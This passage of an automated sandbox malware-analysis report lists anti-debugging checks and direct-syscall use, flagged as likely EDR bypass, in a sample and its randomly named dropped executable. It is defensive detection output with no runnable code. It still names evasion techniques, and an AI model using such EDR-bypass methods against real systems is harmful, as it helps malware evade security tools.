                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0150A6C7 mov eax, dword ptr fs:[00000030h]8_2_0150A6C7
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015506F1 mov eax, dword ptr fs:[00000030h]8_2_015506F1
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015506F1 mov eax, dword ptr fs:[00000030h]8_2_015506F1
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0154E6F2 mov eax, dword ptr fs:[00000030h]8_2_0154E6F2
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0154E6F2 mov eax, dword ptr fs:[00000030h]8_2_0154E6F2
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0154E6F2 mov eax, dword ptr fs:[00000030h]8_2_0154E6F2
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0154E6F2 mov eax, dword ptr fs:[00000030h]8_2_0154E6F2
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014D4690 mov eax, dword ptr fs:[00000030h]8_2_014D4690
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014D4690 mov eax, dword ptr fs:[00000030h]8_2_014D4690
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015066B0 mov eax, dword ptr fs:[00000030h]8_2_015066B0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0150C6A6 mov eax, dword ptr fs:[00000030h]8_2_0150C6A6
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01550946 mov eax, dword ptr fs:[00000030h]8_2_01550946
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015A4940 mov eax, dword ptr fs:[00000030h]8_2_015A4940
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0155C97C mov eax, dword ptr fs:[00000030h]8_2_0155C97C
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014F6962 mov eax, dword ptr fs:[00000030h]8_2_014F6962
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014F6962 mov eax, dword ptr fs:[00000030h]8_2_014F6962
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014F6962 mov eax, dword ptr fs:[00000030h]8_2_014F6962
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01574978 mov eax, dword ptr fs:[00000030h]8_2_01574978
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01574978 mov eax, dword ptr fs:[00000030h]8_2_01574978
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0151096E mov eax, dword ptr fs:[00000030h]8_2_0151096E
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0151096E mov edx, dword ptr fs:[00000030h]8_2_0151096E
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0151096E mov eax, dword ptr fs:[00000030h]8_2_0151096E
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0155C912 mov eax, dword ptr fs:[00000030h]8_2_0155C912
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014C8918 mov eax, dword ptr fs:[00000030h]8_2_014C8918
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014C8918 mov eax, dword ptr fs:[00000030h]8_2_014C8918
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0154E908 mov eax, dword ptr fs:[00000030h]8_2_0154E908
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0154E908 mov eax, dword ptr fs:[00000030h]8_2_0154E908
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0156892B mov eax, dword ptr fs:[00000030h]8_2_0156892B
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0155892A mov eax, dword ptr fs:[00000030h]8_2_0155892A
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015049D0 mov eax, dword ptr fs:[00000030h]8_2_015049D0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0159A9D3 mov eax, dword ptr fs:[00000030h]8_2_0159A9D3
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015669C0 mov eax, dword ptr fs:[00000030h]8_2_015669C0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014DA9D0 mov eax, dword ptr fs:[00000030h]8_2_014DA9D0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014DA9D0 mov eax, dword ptr fs:[00000030h]8_2_014DA9D0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014DA9D0 mov eax, dword ptr fs:[00000030h]8_2_014DA9D0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014DA9D0 mov eax, dword ptr fs:[00000030h]8_2_014DA9D0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014DA9D0 mov eax, dword ptr fs:[00000030h]8_2_014DA9D0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014DA9D0 mov eax, dword ptr fs:[00000030h]8_2_014DA9D0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015029F9 mov eax, dword ptr fs:[00000030h]8_2_015029F9
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015029F9 mov eax, dword ptr fs:[00000030h]8_2_015029F9
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0155E9E0 mov eax, dword ptr fs:[00000030h]8_2_0155E9E0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014D09AD mov eax, dword ptr fs:[00000030h]8_2_014D09AD
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014D09AD mov eax, dword ptr fs:[00000030h]8_2_014D09AD
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015589B3 mov esi, dword ptr fs:[00000030h]8_2_015589B3
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015589B3 mov eax, dword ptr fs:[00000030h]8_2_015589B3
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015589B3 mov eax, dword ptr fs:[00000030h]8_2_015589B3
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E29A0 mov eax, dword ptr fs:[00000030h]8_2_014E29A0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E29A0 mov eax, dword ptr fs:[00000030h]8_2_014E29A0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E29A0 mov eax, dword ptr fs:[00000030h]8_2_014E29A0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E29A0 mov eax, dword ptr fs:[00000030h]8_2_014E29A0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E29A0 mov eax, dword ptr fs:[00000030h]8_2_014E29A0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E29A0 mov eax, dword ptr fs:[00000030h]8_2_014E29A0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E29A0 mov eax, dword ptr fs:[00000030h]8_2_014E29A0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E29A0 mov eax, dword ptr fs:[00000030h]8_2_014E29A0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E29A0 mov eax, dword ptr fs:[00000030h]8_2_014E29A0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E29A0 mov eax, dword ptr fs:[00000030h]8_2_014E29A0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E29A0 mov eax, dword ptr fs:[00000030h]8_2_014E29A0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E29A0 mov eax, dword ptr fs:[00000030h]8_2_014E29A0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E29A0 mov eax, dword ptr fs:[00000030h]8_2_014E29A0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01500854 mov eax, dword ptr fs:[00000030h]8_2_01500854
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E2840 mov ecx, dword ptr fs:[00000030h]8_2_014E2840
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014D4859 mov eax, dword ptr fs:[00000030h]8_2_014D4859
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014D4859 mov eax, dword ptr fs:[00000030h]8_2_014D4859
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01566870 mov eax, dword ptr fs:[00000030h]8_2_01566870
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01566870 mov eax, dword ptr fs:[00000030h]8_2_01566870
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0155E872 mov eax, dword ptr fs:[00000030h]8_2_0155E872
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0155E872 mov eax, dword ptr fs:[00000030h]8_2_0155E872
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0155C810 mov eax, dword ptr fs:[00000030h]8_2_0155C810
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0150A830 mov eax, dword ptr fs:[00000030h]8_2_0150A830
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0157483A mov eax, dword ptr fs:[00000030h]8_2_0157483A
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0157483A mov eax, dword ptr fs:[00000030h]8_2_0157483A
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014F2835 mov eax, dword ptr fs:[00000030h]8_2_014F2835
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014F2835 mov eax, dword ptr fs:[00000030h]8_2_014F2835
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014F2835 mov eax, dword ptr fs:[00000030h]8_2_014F2835
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014F2835 mov ecx, dword ptr fs:[00000030h]8_2_014F2835
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014F2835 mov eax, dword ptr fs:[00000030h]8_2_014F2835
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014F2835 mov eax, dword ptr fs:[00000030h]8_2_014F2835
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014FE8C0 mov eax, dword ptr fs:[00000030h]8_2_014FE8C0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015A08C0 mov eax, dword ptr fs:[00000030h]8_2_015A08C0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0150C8F9 mov eax, dword ptr fs:[00000030h]8_2_0150C8F9
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0150C8F9 mov eax, dword ptr fs:[00000030h]8_2_0150C8F9
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0159A8E4 mov eax, dword ptr fs:[00000030h]8_2_0159A8E4
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0155C89D mov eax, dword ptr fs:[00000030h]8_2_0155C89D
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014D0887 mov eax, dword ptr fs:[00000030h]8_2_014D0887
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0157EB50 mov eax, dword ptr fs:[00000030h]8_2_0157EB50
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015A2B57 mov eax, dword ptr fs:[00000030h]8_2_015A2B57
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015A2B57 mov eax, dword ptr fs:[00000030h]8_2_015A2B57
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015A2B57 mov eax, dword ptr fs:[00000030h]8_2_015A2B57
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015A2B57 mov eax, dword ptr fs:[00000030h]8_2_015A2B57
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01584B4B mov eax, dword ptr fs:[00000030h]8_2_01584B4B
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01584B4B mov eax, dword ptr fs:[00000030h]8_2_01584B4B
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01578B42 mov eax, dword ptr fs:[00000030h]8_2_01578B42
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01566B40 mov eax, dword ptr fs:[00000030h]8_2_01566B40
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01566B40 mov eax, dword ptr fs:[00000030h]8_2_01566B40
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0159AB40 mov eax, dword ptr fs:[00000030h]8_2_0159AB40
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014C8B50 mov eax, dword ptr fs:[00000030h]8_2_014C8B50
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014CCB7E mov eax, dword ptr fs:[00000030h]8_2_014CCB7E
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0154EB1D mov eax, dword ptr fs:[00000030h]8_2_0154EB1D
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0154EB1D mov eax, dword ptr fs:[00000030h]8_2_0154EB1D
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0154EB1D mov eax, dword ptr fs:[00000030h]8_2_0154EB1D
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0154EB1D mov eax, dword ptr fs:[00000030h]8_2_0154EB1D
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0154EB1D mov eax, dword ptr fs:[00000030h]8_2_0154EB1D
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0154EB1D mov eax, dword ptr fs:[00000030h]8_2_0154EB1D
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0154EB1D mov eax, dword ptr fs:[00000030h]8_2_0154EB1D
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0154EB1D mov eax, dword ptr fs:[00000030h]8_2_0154EB1D
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0154EB1D mov eax, dword ptr fs:[00000030h]8_2_0154EB1D
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015A4B00 mov eax, dword ptr fs:[00000030h]8_2_015A4B00
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014FEB20 mov eax, dword ptr fs:[00000030h]8_2_014FEB20
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014FEB20 mov eax, dword ptr fs:[00000030h]8_2_014FEB20
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01598B28 mov eax, dword ptr fs:[00000030h]8_2_01598B28
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01598B28 mov eax, dword ptr fs:[00000030h]8_2_01598B28
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014D0BCD mov eax, dword ptr fs:[00000030h]8_2_014D0BCD
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014D0BCD mov eax, dword ptr fs:[00000030h]8_2_014D0BCD
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014D0BCD mov eax, dword ptr fs:[00000030h]8_2_014D0BCD
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014F0BCB mov eax, dword ptr fs:[00000030h]8_2_014F0BCB
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014F0BCB mov eax, dword ptr fs:[00000030h]8_2_014F0BCB
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014F0BCB mov eax, dword ptr fs:[00000030h]8_2_014F0BCB
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0157EBD0 mov eax, dword ptr fs:[00000030h]8_2_0157EBD0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0155CBF0 mov eax, dword ptr fs:[00000030h]8_2_0155CBF0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014FEBFC mov eax, dword ptr fs:[00000030h]8_2_014FEBFC
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014D8BF0 mov eax, dword ptr fs:[00000030h]8_2_014D8BF0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014D8BF0 mov eax, dword ptr fs:[00000030h]8_2_014D8BF0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014D8BF0 mov eax, dword ptr fs:[00000030h]8_2_014D8BF0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01584BB0 mov eax, dword ptr fs:[00000030h]8_2_01584BB0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01584BB0 mov eax, dword ptr fs:[00000030h]8_2_01584BB0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E0BBE mov eax, dword ptr fs:[00000030h]8_2_014E0BBE
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E0BBE mov eax, dword ptr fs:[00000030h]8_2_014E0BBE
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E0A5B mov eax, dword ptr fs:[00000030h]8_2_014E0A5B
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E0A5B mov eax, dword ptr fs:[00000030h]8_2_014E0A5B
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014D6A50 mov eax, dword ptr fs:[00000030h]8_2_014D6A50
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014D6A50 mov eax, dword ptr fs:[00000030h]8_2_014D6A50
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014D6A50 mov eax, dword ptr fs:[00000030h]8_2_014D6A50
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014D6A50 mov eax, dword ptr fs:[00000030h]8_2_014D6A50
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014D6A50 mov eax, dword ptr fs:[00000030h]8_2_014D6A50
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014D6A50 mov eax, dword ptr fs:[00000030h]8_2_014D6A50
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014D6A50 mov eax, dword ptr fs:[00000030h]8_2_014D6A50
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0154CA72 mov eax, dword ptr fs:[00000030h]8_2_0154CA72
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0154CA72 mov eax, dword ptr fs:[00000030h]8_2_0154CA72
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0157EA60 mov eax, dword ptr fs:[00000030h]8_2_0157EA60
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0150CA6F mov eax, dword ptr fs:[00000030h]8_2_0150CA6F
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0150CA6F mov eax, dword ptr fs:[00000030h]8_2_0150CA6F
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0150CA6F mov eax, dword ptr fs:[00000030h]8_2_0150CA6F
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0155CA11 mov eax, dword ptr fs:[00000030h]8_2_0155CA11
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014FEA2E mov eax, dword ptr fs:[00000030h]8_2_014FEA2E
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0150CA38 mov eax, dword ptr fs:[00000030h]8_2_0150CA38
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0150CA24 mov eax, dword ptr fs:[00000030h]8_2_0150CA24
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014F4A35 mov eax, dword ptr fs:[00000030h]8_2_014F4A35
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014F4A35 mov eax, dword ptr fs:[00000030h]8_2_014F4A35
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01504AD0 mov eax, dword ptr fs:[00000030h]8_2_01504AD0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01504AD0 mov eax, dword ptr fs:[00000030h]8_2_01504AD0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014D0AD0 mov eax, dword ptr fs:[00000030h]8_2_014D0AD0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01526ACC mov eax, dword ptr fs:[00000030h]8_2_01526ACC
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01526ACC mov eax, dword ptr fs:[00000030h]8_2_01526ACC
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01526ACC mov eax, dword ptr fs:[00000030h]8_2_01526ACC
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0150AAEE mov eax, dword ptr fs:[00000030h]8_2_0150AAEE
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0150AAEE mov eax, dword ptr fs:[00000030h]8_2_0150AAEE
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01508A90 mov edx, dword ptr fs:[00000030h]8_2_01508A90
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014DEA80 mov eax, dword ptr fs:[00000030h]8_2_014DEA80
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014DEA80 mov eax, dword ptr fs:[00000030h]8_2_014DEA80
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014DEA80 mov eax, dword ptr fs:[00000030h]8_2_014DEA80
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exeNtOpenKeyEx: Direct from: 0x77672B9CJump to behavior
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exeNtProtectVirtualMemory: Direct from: 0x77672F9CJump to behavior
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exeNtCreateFile: Direct from: 0x77672FECJump to behavior
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exeNtOpenFile: Direct from: 0x77672DCCJump to behavior
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exeNtTerminateThread: Direct from: 0x77672FCCJump to behavior
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exeNtProtectVirtualMemory: Direct from: 0x77667B2EJump to behavior
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exeNtQueryInformationToken: Direct from: 0x77672CACJump to behavior
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exeNtAllocateVirtualMemory: Direct from: 0x77672BECJump to behavior
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exeNtDeviceIoControlFile: Direct from: 0x77672AECJump to behavior
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exeNtQuerySystemInformation: Direct from: 0x776748CCJump to behavior
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exeNtQueryAttributesFile: Direct from: 0x77672E6CJump to behavior
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exeNtSetInformationThread: Direct from: 0x77672B4CJump to behavior
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exeNtOpenSection: Direct from: 0x77672E0CJump to behavior
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exeNtQueryVolumeInformationFile: Direct from: 0x77672F2CJump to behavior
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exeNtAllocateVirtualMemory: Direct from: 0x776748ECJump to behavior
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exeNtSetInformationThread: Direct from: 0x776663F9Jump to behavior
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exeNtReadVirtualMemory: Direct from: 0x77672E8CJump to behavior
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exeNtCreateKey: Direct from: 0x77672C6CJump to behavior
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exeNtClose: Direct from: 0x77672B6C
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exeNtWriteVirtualMemory: Direct from: 0x7767490CJump to behavior
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exeNtAllocateVirtualMemory: Direct from: 0x77673C9CJump to behavior
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exeNtDelayExecution: Direct from: 0x77672DDCJump to behavior
